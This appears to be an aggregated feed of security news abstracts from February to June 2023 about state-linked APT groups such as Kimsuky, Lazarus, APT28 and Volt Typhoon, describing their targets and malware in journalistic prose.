Abstract
North Korea-linked APT group Kimsuky is posing as journalists to gather intelligence, a joint advisory from NSA and FBI warns. A joint advisory from the FBI, the U.S. Department of State, the National Security Agency (NSA), South Korea’s National...Security Affairs
June 02, 2023
North Korea’s Kimsuky Group Mimics Key Figures in Targeted Cyber Attacks Full Text
Abstract
U.S. and South Korean intelligence agencies have issued a new alert warning of North Korean cyber actors' use of social engineering tactics to strike think tanks, academia, and news media sectors. The "sustained information gathering efforts" have been attributed to a state-sponsored cluster dubbed Kimsuky , which is also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima. "North Korea relies heavily on intelligence gained from these spear-phishing campaigns," the agencies said . "Successful compromises of the targeted individuals enable Kimsuky actors to craft more credible and effective spear-phishing emails that can be leveraged against sensitive, high-value targets." Kimsuky refers to an ancillary element within North Korea's Reconnaissance General Bureau (RGB) and is known to collect tactical intelligence on geopolitical events and negotiations affecting the regiThe Hacker News
June 1, 2023
Operation Triangulation: previously undetected malware targets iOS devices Full Text
Abstract
A previously undocumented APT group targets iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation. Researchers from the Russian firm Kaspersky have uncovered a previously unknown APT group that is targeting...Security Affairs
May 31, 2023
Dark Pink APT Group Leverages TelePowerBot and KamiKakaBot in Sophisticated Attacks Full Text
Abstract
The threat actor known as Dark Pink has been linked to five new attacks aimed at various entities in Belgium, Brunei, Indonesia, Thailand, and Vietnam between February 2022 and April 2023. This includes educational institutions, government agencies, military bodies, and non-profit organizations, indicating the adversarial crew's continued focus on high-value targets. Dark Pink, also called Saaiwc Group, is an advanced persistent threat (APT) actor believed to be of Asia-Pacific origin, with attacks targeting entities primarily located in East Asia and, to a lesser extent, in Europe. The group employs a set of custom malware tools such as TelePowerBot and KamiKakaBot that provide various functions to exfiltrate sensitive data from compromised hosts. "The group uses a range of sophisticated custom tools, deploys multiple kill chains relying on spear-phishing emails," Group-IB security researcher Andrey Polovinkin said in a technical report shared with The Hacker News. "OncThe Hacker News
May 26, 2023
New PowerExchange Backdoor linked to an Iranian APT group Full Text
Abstract
An alleged Iran-linked APT group targeted an organization linked to the United Arab Emirates (U.A.E.) with the new PowerExchange backdoor. Researchers from the Fortinet FortiGuard Labs observed an attack targeting a government entity in the United...Security Affairs
May 25, 2023
China-linked APT Volt Typhoon targets critical infrastructure organizations Full Text
Abstract
A China-linked APT group, tracked as Volt Typhoon, breached critical infrastructure organizations in the U.S. and Guam without being detected. China-linked APT cyber espionage group Volt Typhoon infiltrated critical infrastructure organizations in the U.S....Security Affairs
May 25, 2023
North Korea-linked Lazarus APT targets Microsoft IIS servers to deploy malware Full Text
Abstract
North Korea-linked APT group Lazarus actor has been targeting vulnerable Microsoft IIS servers to deploy malware. AhnLab Security Emergency response Center (ASEC) researchers reported that the Lazarus APT Group is targeting vulnerable versions of Microsoft...Security Affairs
May 25, 2023
Iran-linked Tortoiseshell APT behind watering hole attacks on shipping and logistics Israeli websites Full Text
Abstract
Iran-linked threat actor Tortoiseshell targeted shipping, logistics, and financial services companies in Israel with watering hole attacks. ClearSky Cyber Security uncovered a watering hole attack on at least eight Israeli websites belonging to shipping,...Security Affairs
May 23, 2023
GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments Full Text
Abstract
Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal . Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy. The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance. GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation. What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored gThe Hacker News
May 23, 2023
The previously undocumented GoldenJackal APT targets Middle East, South Asia entities Full Text
Abstract
A previously undocumented APT group tracked as GoldenJackal has been targeting government and diplomatic entities in the Middle East and South Asia since 2019. Kaspersky researchers shared details about the activity of a previously undocumented APT group,...Security Affairs
May 23, 2023
North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware Full Text
Abstract
The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation. "Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a report published today. The ongoing targeted campaign, per the cybersecurity firm, is primarily geared towards information services as well as organizations supporting human rights activists and North Korean defectors. Kimsuky, active since 2012, has exhibited targeting patterns that align with North Korea's operational mandates and priorities. The intelligence collection missions have involved the use of a diverse set of malware, including another reconnaissance program called ReconShark , as detailed by SentinelOne earlier this month. The latest activityThe Hacker News
May 23, 2023
A deeper insight into the CloudWizard APT’s activity revealed a long-running activity Full Text
Abstract
Experts warn of a threat actor, tracked as CloudWizard APT, that is targeting organizations involved in the region of the Russo-Ukrainian conflict. On March 2023, researchers from Kaspersky spotted a previously unknown APT group, tracked as Bad...Security Affairs
May 20, 2023
CommonMagic Implants Linked to CloudWizard Full Text
Abstract
The APT campaign employs a modular framework called CloudWizard. This framework is capable of taking screenshots, keylogging, and recording audio from the microphone. The CloudWizard framework comprises nine modules that enable a variety of hacking capabilities.Cyware
May 17, 2023
Lancefly APT Group Uses ‘Merdoor’ In Espionage Campaign Full Text
Abstract
The Lancefly APT group is targeting government, aviation, education, and telecom sectors in South and Southeast Asia using a powerful backdoor called Merdoor for intelligence gathering. The exact initial intrusion vector is not clear at present, though attackers are believed to have used SSH brute- ... Read MoreCyware
May 16, 2023
China-linked APT Mustang Panda targets TP-Link routers with a custom firmware implant Full Text
Abstract
China-linked APT group Mustang Panda employed a custom firmware implant targeting TP-Link routers in targeted attacks since January 2023. Since January 2023, Check Point Research monitored a series of targeted attacks aimed at European foreign...Security Affairs
May 16, 2023
Water Orthrus APT Re-Emerges with Two New Malware Families Full Text
Abstract
The threat actor known as Water Orthrus was spotted with two new campaigns in March and April 2023 that intended to deliver CopperStealth and CopperPhish payloads. The new malware have been upgraded for different purposes, such as injecting network advertisements, acquiring personal informatio ... Read MoreCyware
May 16, 2023
Lancefly APT uses powerful Merdoor backdoor in attacks on Asian orgs Full Text
Abstract
The Lancefly APT group is using a custom powerful backdoor called Merdoor in attacks against organizations in South and Southeast Asia. Symantec researchers reported that the Lancefly APT group is using a custom-written backdoor in attacks targeting...Security Affairs
May 11, 2023
New APT Group Red Stinger Targets Military and Critical Infrastructure in Eastern Europe Full Text
Abstract
A previously undetected advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020. "Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums ," Malwarebytes disclosed in a report published today. "Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings." Red Stinger overlaps with a threat cluster Kaspersky revealed under the name Bad Magic last month as having targeted government, agriculture, and transportation organizations located in Donetsk, Lugansk, and Crimea last year. While there were indications that the APT group may have been active since at least September 2021, the latest findings from Malwarebytes push the group's origins back by nearly a year, with the first operation taking place in December 2020.The Hacker News
May 11, 2023
North Korea-linked APT breached the Seoul National University Hospital Full Text
Abstract
The Korean National Police Agency (KNPA) warns that a North Korea-linked APT group had breached the Seoul National University Hospital (SNUH). The Korean National Police Agency (KNPA) revealed that a North Korea-linked APT group has breached one of the largest...Security Affairs
May 09, 2023
Researchers Uncover SideWinder’s Latest Server-Based Polymorphism Technique Full Text
Abstract
The advanced persistent threat (APT) actor known as SideWinder has been accused of deploying a backdoor in attacks directed against Pakistan government organizations as part of a campaign that commenced in late November 2022. "In this campaign, the SideWinder advanced persistent threat (APT) group used a server-based polymorphism technique to deliver the next stage payload," the BlackBerry Research and Intelligence Team said in a technical report published Monday. Another campaign discovered by the Canadian cybersecurity company in early March 2023 shows that Turkey has also landed in the crosshairs of the threat actor's collection priorities. SideWinder has been on the radar since at least 2012 and it's primarily known to target various Southeast Asian entities located across Pakistan, Afghanistan, Bhutan, China, Myanmar, Nepal, and Sri Lanka. Suspected to be an Indian state-sponsored group, SideWinder is also tracked under the monikers APT-C-17, APT-Q-39, HaThe Hacker News
May 9, 2023
Iran-linked APT groups started exploiting Papercut flaw Full Text
Abstract
Microsoft warns of Iran-linked APT groups that are targeting vulnerable PaperCut MF/NG print management servers. Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print...Security Affairs
May 7, 2023
Dragon Breath APT uses double-dip DLL sideloading strategy Full Text
Abstract
An APT group tracked as Dragon Breath has been observed employing a new DLL sideloading technique. Sophos researchers observed an APT group, tracked as Dragon Breath (aka APT-Q-27 and Golden Eye), that is using a new DLL sideloading technique that...Security Affairs
May 06, 2023
Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry Full Text
Abstract
An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism. "The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher Gabor Szappanos said . "The latest campaigns add a twist in which a first-stage clean application 'side'-loads a second clean application and auto-executes it. The second clean application side-loads the malicious loader DLL. After that, the malicious loader DLL executes the final payload." Operation Dragon Breath, also tracked under the names APT-Q-27 and Golden Eye, was first documented by QiAnXin in 2020, detailing a watering hole campaign designed to trick users into downloading a trojanized Windows installer for Telegram. A subsequent campaign deThe Hacker News
May 5, 2023
North Korea-linked Kimsuky APT uses new recon tool ReconShark Full Text
Abstract
North Korea-linked APT group Kimsuky has been observed using a new reconnaissance tool dubbed ReconShark in a recent campaign. SentinelOne researchers observed an ongoing campaign from North Korea-linked Kimsuky Group that is using...Security Affairs
May 4, 2023
Dragon Breath APT Uses Double DLL Sideloading Tactic Full Text
Abstract
A group of advanced persistent hackers, who go by the alias Dragon Breath, has adopted a new strategy of utilizing multiple sophisticated versions of the conventional DLL sideloading method to avoid detection. Its attack strategy involves using an initial vector that exploits a legitimate applicati ... Read MoreCyware
May 4, 2023
Russia-linked Sandworm APT uses WinRAR in destructive attacks on Ukraine’s public sector Full Text
Abstract
CERT-UA is warning of destructive cyberattacks conducted by the Russia-linked Sandworm APT group against the Ukraine public sector. Russia-linked APT group Sandworm is behind destructive cyberattacks against Ukrainian state networks, the Ukrainian...Security Affairs
May 4, 2023
APT28APT28 Uses ‘Windows Update’ Phishing Emails to Target Ukrainian Agencies Full Text
Abstract
Russian state-sponsored hacking group APT28 is targeting Ukrainian government entities with malicious emails disguised as Windows update instructions - warned CERT-UA. The attack begins with phishing emails sent to employees in government bodies, masquerading as system administrators of their depar ... Read MoreCyware
May 2, 2023
North Korea-linked ScarCruft APT uses large LNK files in infection chains Full Text
Abstract
North Korea-linked ScarCruft APT group started using oversized LNK files to deliver the RokRAT malware starting in early July 2022. Check Point researchers reported that the infection chains observed in the attacks attributed to North Korea-linked...Security Affairs
May 01, 2023
APT28 Targets Ukrainian Government Entities with Fake “Windows Update” Emails Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of cyber attacks perpetrated by Russian nation-state hackers targeting various government bodies in the country. The agency attributed the phishing campaign to APT28, which is also known by the names Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, Sednit, and Sofacy. The email messages come with the subject line "Windows Update" and purportedly contain instructions in the Ukrainian language to run a PowerShell command under the pretext of security updates. Running the script loads and executes a next-stage PowerShell script that's designed to collect basic system information through commands like tasklist and systeminfo , and exfiltrate the details via an HTTP request to a Mocky API . To trick the targets into running the command, the emails impersonated system administrators of the targeted government entities using fake Microsoft Outlook email accounts created with the employees'The Hacker News
May 1, 2023
Russian APT Nomadic Octopus hacked Tajikistani carrier Full Text
Abstract
Russian APT group Nomadic Octopus hacked a Tajikistani carrier to spy on government officials and public service infrastructures. Russian cyber espionage group Nomadic Octopus (aka DustSquad) has hacked a Tajikistani telecoms provider to spy on 18 entities,...Security Affairs
April 30, 2023
Russia-linked APT28 uses fake Windows Update instructions to target Ukraine govt bodies Full Text
Abstract
CERT-UA warns of a spear-phishing campaign conducted by APT28 group targeting Ukrainian government bodies with fake ‘Windows Update’ guides. Russia-linked APT28 group is targeting Ukrainian government bodies with fake ‘Windows Update’ guides,...Security Affairs
April 27, 2023
Iranian Charming Kitten APT used a new BellaCiao malware in recent wave of attacks Full Text
Abstract
Iran-linked APT group Charming Kitten employed a new malware dubbed BellaCiao in attacks against victims in the U.S., Europe, the Middle East and India. Iran-linked Charming Kitten group, (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...Security Affairs
April 26, 2023
China-linked Alloy Taurus APT uses a Linux variant of PingPull malware Full Text
Abstract
China-linked threat actor tracked as Alloy Taurus is using a Linux variant of the PingPull backdoor and a new tool dubbed Sword2033. Researchers from Palo Alto Networks Unit 42 recently observed the China-linked Alloy Taurus group (aka GALLIUM,...Security Affairs
April 26, 2023
Charming Kitten APT Uses BellaCiao Malware to Target Victims in US, Europe, Middle East, and India Full Text
Abstract
This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.Cyware
April 24, 2023
Mint Sandstorm Targets U.S. Critical Infrastructure Full Text
Abstract
Microsoft connected the Iranian Mint Sandstorm APT group (aka PHOSPHORUS) to a wave of attacks, between late-2021 and mid-2022, targeting the U.S. critical infrastructure. The group targets private/public organizations, including activists, journalists, the Defense Industrial Base (DIB), political ... Read MoreCyware
April 20, 2023
APT28 Uses Vulnerability in Cisco Routers to Deploy Malware Full Text
Abstract
Government agencies in the U.S. and the U.K. issued a joint advisory to warn organizations about attacks exploiting an old vulnerability in Cisco routers. The attacks are attributed to the Fancy Bear threat group and the flaw in question is CVE-2017-6742. The attackers are exploiting the vulnerabil ... Read MoreCyware
April 20, 2023
Lazarus APT group employed Linux Malware in recent attacks and was linked to 3CX supply chain attack Full Text
Abstract
North Korea-linked APT group Lazarus employed new Linux malware in attacks that are part of Operation Dream Job. North Korea-linked APT group Lazarus is behind a new campaign tracked as Operation DreamJob (aka DeathNote or NukeSped) that employed...Security Affairs
April 20, 2023
New Infrastructure of MuddyWater APT Group Uncovered Full Text
Abstract
MuddyWater has been employing SimpleHelp, a lawful tool used for managing and controlling remote devices, to establish persistence on compromised devices, revealed researchers. The attackers send phishing emails containing links to file storage systems such as OneDrive, Dropbox, or OneHub to downlo ... Read MoreCyware
April 20, 2023
Google TAG warns of Russia-linked APT groups targeting Ukraine Full Text
Abstract
The researchers from Google TAG are warning of Russia-linked threat actors targeting Ukraine with phishing campaigns. Russia-linked threat actors launched large-volume phishing campaigns against hundreds of users in Ukraine to gather intelligence...Security Affairs
April 19, 2023
US and UK agencies warn of Russia-linked APT28 exploiting Cisco router flaws Full Text
Abstract
UK and US agencies are warning of Russia-linked APT28 group exploiting vulnerabilities in Cisco networking equipment. Russia-linked APT28 group accesses unpatched Cisco routers to deploy malware exploiting the not patched CVE-2017-6742 vulnerability...Security Affairs
April 19, 2023
Iran-linked Mint Sandstorm APT targeted US critical infrastructure Full Text
Abstract
An Iran-linked APT group tracked as Mint Sandstorm is behind a string of attacks aimed at US critical infrastructure between late 2021 to mid-2022. Microsoft has linked the Iranian Mint Sandstorm APT (previously tracked by Microsoft as PHOSPHORUS)...Security Affairs
April 18, 2023
Ex-Conti Members and Fin7 APT Join Hands for New Domino Backdoor Full Text
Abstract
The now-defunct Conti ransomware gang members were observed deploying a new malware strain, dubbed Domino, that appears to have been developed by the FIN7 cybercrime organization. Domino has been active in the wild since at least October 2022. Organizations and security teams need a robust Threat I ... Read MoreCyware
April 17, 2023
China-linked APT41 group spotted using open-source red teaming tool GC2 Full Text
Abstract
In October 2022, threat actors sent phishing emails that contained links to a password-protected file hosted in Drive. The final payload was the Go-written GC2 tool that gets commands from Google Sheets and exfiltrates data to Google Drive.Cyware
April 17, 2023
Vixen Panda APT Group suspected of targeting foreign ministry in cyberattack Full Text
Abstract
A Chinese hacker group, Vixen Panda, is suspected of targeting the Foreign Ministry in a recent cyberattack. As per a new report by Euractiv, the hackers showed a keen interest in policy documents.Cyware
April 17, 2023
Google Uncovers APT41’s Use of Open Source GC2 Tool to Target Media and Job Sites Full Text
Abstract
A Chinese nation-state group targeted an unnamed Taiwanese media organization to deliver an open source red teaming tool known as Google Command and Control ( GC2 ) amid broader abuse of Google's infrastructure for malicious ends. The tech giant's Threat Analysis Group (TAG) attributed the campaign to a threat actor it tracks under the geological and geographical-themed moniker HOODOO , which is also known by the names APT41 , Barium, Bronze Atlas, Wicked Panda, and Winnti . The starting point of the attack is a phishing email that contains links to a password-protected file hosted on Google Drive, which, in turn, incorporates the GC2 tool to read commands from Google Sheets and exfiltrate data using the cloud storage service. "After installation on the victim machine, the malware queries Google Sheets to obtain attacker commands," Google's cloud division said in its sixth Threat Horizons Report. "In addition to exfiltration via Drive, GC2 enablThe Hacker News
April 15, 2023
APT28 Leader’s Email Breached by Ukrainian Hackers Full Text
Abstract
Ukrainian hacker group Cyber Resistance claimed to have hacked the personal accounts, emails, and social media of a Russian GRU officer, who is also the leader of APT28. The email hack allowed the hackers to extract sensitive documents along with personal information and photos, and then leak them ... Read MoreCyware
April 13, 2023
The Russia-linked APT29 is behind recent attacks targeting NATO and EU Full Text
Abstract
Poland intelligence linked the Russian APT29 group to a series of attacks targeting NATO and European Union countries. Poland's Military Counterintelligence Service and its Computer Emergency Response Team linked a recent string of attacks targeting...Security Affairs
April 13, 2023
Pakistan-Aligned Transparent Tribe APT Expands Interest in Indian Education Sector Full Text
Abstract
SentinelLabs has been tracking a recently disclosed cluster of malicious Office documents that distribute Crimson RAT, used by the APT36 group (aka Transparent Tribe) targeting the education sector.Cyware
April 12, 2023
Ukrainian Hackers Breach Email of APT28 Leader, Who’s Wanted by FBI Full Text
Abstract
Ukrainian hacker group Cyber Resistance, aka Ukrainian Cyber Alliance, has claimed to have hacked the email, social media, and personal accounts of Russian GRU officer Lieutenant Colonel Sergey Alexandrovich Morgachev, the leader of APT28.Cyware
April 10, 2023
Iran-linked MERCURY APT behind destructive attacks on hybrid environments Full Text
Abstract
Iran-linked APT group MERCURY is behind destructive attacks on hybrid environments masquerading as a ransomware operation. The Microsoft Threat Intelligence team observed a series of destructive attacks on hybrid environments that were carried out by MuddyWater...Security Affairs
April 6, 2023
Analyzing attacks conducted by North Korea-linked ARCHIPELAGO APT group Full Text
Abstract
Google's Threat Analysis Group (TAG) warns of a North Korea-linked cyberespionage group tracked as ARCHIPELAGO. Google's Threat Analysis Group (TAG) is warning of the North Korea-linked ARCHIPELAGO group that is targeting government and military personnel,...Security Affairs
April 2, 2023
Leaked documents from Russian firm NTC Vulkan show Sandworm cyberwarfare arsenal Full Text
Abstract
Files leaked by Russian IT contractor NTC Vulkan show that Russia-linked Sandworm APT requested it to develop offensive tools. Documents leaked from Russian IT contractor NTC Vulkan show it was likely involved in the development of offensive tools....Security Affairs
March 31, 2023
Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability Full Text
Abstract
The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign. "TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report. The enterprise security firm is tracking the activity under its own moniker TA473 (aka UAC-0114), describing it as an adversarial crew whose operations align with that of Russian and Belarussian geopolitical objectives. What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican . The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score:The Hacker News
March 29, 2023
Bitter APT Espionage Group Targets Nuclear Energy Firms in China Full Text
Abstract
The nuclear energy sector of China is reportedly facing threats from Bitter, a South Asian APT. The group specializes in using Excel exploits, Windows Installer (MSI) files, and Microsoft Compiled HTML Help (CHM) files. Besides, the group is infamous for targeting energy and government organization ... Read MoreCyware
March 29, 2023
North Korean APT43 Group Uses Cybercrime to Fund Espionage Operations Full Text
Abstract
A new North Korean nation-state cyber operator has been attributed to a series of campaigns orchestrated to gather strategic intelligence that aligns with Pyongyang's geopolitical interests since 2018. Google-owned Mandiant, which is tracking the activity cluster under the moniker APT43 , said the group's motives are both espionage- and financially-motivated, leveraging techniques like credential harvesting and social engineering to further its objectives. The monetary angle to its attack campaigns is an attempt on the part of the threat actor to generate funds to meet its "primary mission of collecting strategic intelligence." Victimology patterns suggest that targeting is focused on South Korea, the U.S., Japan, and Europe, spanning government, education, research, policy institutes, business services, and manufacturing sectors. The threat actor was also observed straying off course by striking health-related verticals and pharma companies from October 2020The Hacker News
March 28, 2023
Newly exposed APT43 hacking group targeting US orgs since 2018 Full Text
Abstract
A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years.BleepingComputer
March 28, 2023
Pakistan-Origin SideCopy Linked to New Cyberattack on India’s Ministry of Defence Full Text
Abstract
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT. According to Cyble, which attributed the operation to SideCopy , the activity cluster is designed to target the Defence Research and Development Organization ( DRDO ), the research and development wing of India's Ministry of Defence. Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe . It has been active since at least 2019. Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO. Executing the .LNK file leads to the retrieval of an HTML application from a remoteThe Hacker News
March 28, 2023
Bitter APT group targets China’s nuclear energy sector Full Text
Abstract
Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked...Security Affairs
March 27, 2023
Technical analysis of China-linked Earth Preta APT’s infection chain Full Text
Abstract
China-linked Earth Preta cyberespionage group has been observed adopting new techniques to bypass security solutions. Trend Micro researchers reported that the China-linked Earth Preta group (aka Mustang Panda) is actively changing its tools, tactics,...Security Affairs
March 24, 2023
SideCopy APT Targets India’s Premier Defense Research Agency Full Text
Abstract
SideCopy APT traditionally uses spear phishing as its method to gain initial entry. Emails in the latest campaign purportedly contain research material about military technologies sent as attachments.Cyware
March 23, 2023
Kimsuky Updates its Tactics to Target South Korean Experts Full Text
Abstract
German and South Korean government agencies warned about a new spear-phishing campaign by the North Korean APT, Kimsuky. The campaign targets experts on issues related to the Korean peninsula. Attackers send a spear-phishing email to the targeted victims, asking them to install a malicious Chrome e ... Read MoreCyware
March 23, 2023
Black Magic APT Targets Ukraine with CommonMagic and PowerMagic Full Text
Abstract
Kaspersky researchers have identified cyberattacks targeting government, agriculture, and transportation organizations in Donetsk, Lugansk, and Crimea, conducted by the new Bad Magic APT. The campaign leverages old artifacts created as early as September 2021, along with a previously unseen malicio ... Read MoreCyware
March 22, 2023
Winter Vivern APT Targets European Government Entities With Aperetif Full Text
Abstract
SentinelOne spotted the Winter Vivern APT group targeting Polish government agencies, Indian government entities, the Ukraine Ministry of Foreign Affairs, and the Italy Ministry of Foreign Affairs in cyberespionage campaigns since 2021.Cyware
March 21, 2023
New Bad Magic APT used CommonMagic framework in the area of Russo-Ukrainian conflict Full Text
Abstract
Threat actors are targeting organizations located in Donetsk, Lugansk, and Crimea with a previously undetected framework dubbed CommonMagic. In October 2022, Kaspersky researchers uncovered a malware campaign aimed at infecting government, agriculture...Security Affairs
March 21, 2023
New APT Found Actively Using PowerMagic Backdoor and CommonMagic Framework Full Text
Abstract
In October 2022, Kaspersky researchers identified an active infection of government, agriculture, and transportation organizations located in the Donetsk, Lugansk, and Crimea regions.Cyware
March 17, 2023
China-based Tick APT Deploys Custom Malware and Use Other Tools Full Text
Abstract
ESET researchers found that the Tick cyberespionage group compromised an East Asian Data-Loss Prevention (DLP) company in 2021 and used a wide range of tools in similar attacks. In one of its campaigns, it used a tampered version of a legitimate app called Q-Dir to drop an open-source VBScript back ... Read MoreCyware
March 17, 2023
China-linked APT likely linked to Fortinet zero-day attacks Full Text
Abstract
An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks...Security Affairs
March 17, 2023
Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials Full Text
Abstract
The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said . Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents conThe Hacker News
March 15, 2023
Russia-linked APT29 abuses EU information exchange systems in recent attacks Full Text
Abstract
Russia-linked APT29 group abused the legitimate information exchange systems used by European countries to target government entities. Russia-linked APT29 (aka SVR group, Cozy Bear, Nobelium, and The Dukes) was spotted abusing the legitimate information...Security Affairs
March 15, 2023
YoroTrooper APT group targets CIS countries and embassies Full Text
Abstract
A new APT group, dubbed YoroTrooper, has been targeting government and energy organizations across Europe, experts warn. Cisco Talos researchers uncovered a new cyber espionage group targeting CIS countries, embassies and EU health care agency since...Security Affairs
March 15, 2023
Tick APT Targeted High-Value Customers of East Asian Data-Loss Prevention Company Full Text
Abstract
A cyberespionage actor known as Tick has been attributed with high confidence to a compromise of an East Asian data-loss prevention (DLP) company that caters to government and military entities. "The attackers compromised the DLP company's internal update servers to deliver malware inside the software developer's network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company's customers," ESET researcher Facundo Muñoz said . Tick , also known as Bronze Butler, REDBALDKNIGHT , Stalker Panda, and Stalker Taurus, is a suspected China-aligned collective that has primarily gone after government, manufacturing, and biotechnology firms in Japan. It's said to be active since at least 2006 . Other lesser-known targets include Russian, Singaporean, and Chinese enterprises. Attack chains orchestrated by the group have typically leveraged spear-phishing emails and strThe Hacker News
March 13, 2023
Dark Pink APT targets Govt entities in South Asia Full Text
Abstract
Researchers reported that Dark Pink APT employed a malware dubbed KamiKakaBot against Southeast Asian targets. In February 2023, EclecticIQ researchers spotted multiple KamiKakaBot malware samples that were employed by the Dark Pink APT group (aka...Security Affairs
March 8, 2023
North Korea-linked Lazarus APT used a 0-day in a recent attack Full Text
Abstract
North Korea-linked Lazarus APT group exploits a zero-day vulnerability in attacks aimed at a South Korean financial entity. ASEC (AhnLab Security Emergency Response Center) observed North Korea-linked Lazarus APT group exploiting a zero-day vulnerability...Security Affairs
March 8, 2023
China-linked APT Sharp Panda targets government entities in Southeast Asia Full Text
Abstract
China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. CheckPoint researchers observed in late 2022, a campaign attributed to the China-linked APT group Sharp Panda that is targeting...Security Affairs
March 6, 2023
After Clasiopa, APT41 Targets Asian Materials Sector Full Text
Abstract
Symantec warned against the Chinese state-sponsored Winnti, aka APT41 and Blackfly, hacker group targeting two subsidiaries of an Asian conglomerate in the materials sector. The operation ran from late 2022 to early 2023, with a focus on intellectual property theft. Symantec has provided IOCs to de ... Read MoreCyware
March 3, 2023
MQsTTang, a new backdoor used by Mustang Panda APT against European entities Full Text
Abstract
China-Linked Mustang Panda APT employed MQsTTang backdoor as part of an ongoing campaign targeting European entities. China-linked Mustang Panda APT group has been observed using a new backdoor, called MQsTTang, in attacks aimed at European...Security Affairs
February 28, 2023
APT-C-36 Strikes Again: Blind Eagle Hackers Target Key Industries in Colombia Full Text
Abstract
The threat actor known as Blind Eagle has been linked to a new campaign targeting various key industries in Colombia. The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group's victimology footprint. Targeted entities include health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in Colombia, the Canadian cybersecurity company said. Blind Eagle, also known as APT-C-36 , was recently covered by Check Point Research, detailing the adversary's advanced toolset comprising Meterpreter payloads that are delivered via spear-phishing emails. The latest set of attacks involves the group impersonating the Colombian government tax agency, the National Directorate of Taxes and Customs (DIAN), to phish its targets using lures that urge recipients to settle "outstanding obligations." ThThe Hacker News
February 25, 2023
CERT of Ukraine says Russia-linked APT backdoored multiple govt sites Full Text
Abstract
The CERT of Ukraine (CERT-UA) revealed that Russia-linked threat actors have compromised multiple government websites this week. The Computer Emergency Response Team of Ukraine (CERT-UA) said that Russia-linked threat actors have breached multiple...Security Affairs
February 21, 2023
Newly Identified Earth Yako APT Observed Targeting Japanese Entities Full Text
Abstract
Trend Micro experts observed several targeted attacks against researchers of academic organizations and think tanks in Japan and attributed the campaign to Earth Yako. Previous to this, Earth Yako APT group has been abusing legitimate services such as Dropbox, GitHub, and Protonmail to expand its c ... Read MoreCyware
February 19, 2023
ENISA and CERT-EU warns Chinese APTs targeting EU organizations Full Text
Abstract
